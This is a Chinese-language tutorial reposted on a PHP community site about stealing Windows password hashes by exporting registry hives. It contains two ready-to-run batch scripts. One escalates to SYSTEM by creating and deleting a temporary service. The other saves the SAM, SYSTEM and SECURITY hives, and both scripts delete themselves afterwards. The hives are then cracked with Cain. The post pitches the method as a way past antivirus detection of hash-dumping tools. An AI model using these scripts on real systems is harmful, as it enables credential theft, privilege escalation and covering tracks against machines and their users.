当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

导出系统注册表抓Hash

作者:TheLostMind看到一篇文章,提到导出注册表永CAIN来破密码,这对很多抓hash的工具被杀了,自己又不会做免杀的大牛来说,是个福音,其实这个很早以前就有了,貌似是老外提出了的,只是没有引起注意。作者说这个方法不是通杀的:Windows2000SP4(adm

作者:TheLostMind

看到一篇文章,提到导出注册表永CAIN来破密码,这对很多抓hash的工具被杀了,自己又不会做免杀的大牛来说,是个福音,其实这个很早以前就有了,貌似是老外提出了的,只是没有引起注意。

作者说这个方法不是通杀的:

Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works

对用户权限有要求,默认XP SP3是导出不了的,我本地测试了,但是system权限是可以的,那么咱可以创建一个system权限运行的CMD,然后再导出就OK了。

其他系统上面没有测试过,大家自己整吧。

首先创建一个系统权限执行的CMD:

======================StartSystemCmd.bat=========

sc Create systemcmd binPath= "cmd /K start" type= own type= interact
sc start systemcmd
sc delete systemcmd
del %0

=======================END=========================

然后导出文件。

==================SaveReg.bat=======================

@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0

=====================END============================

然后倒入到CAIN里面破吧。

吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有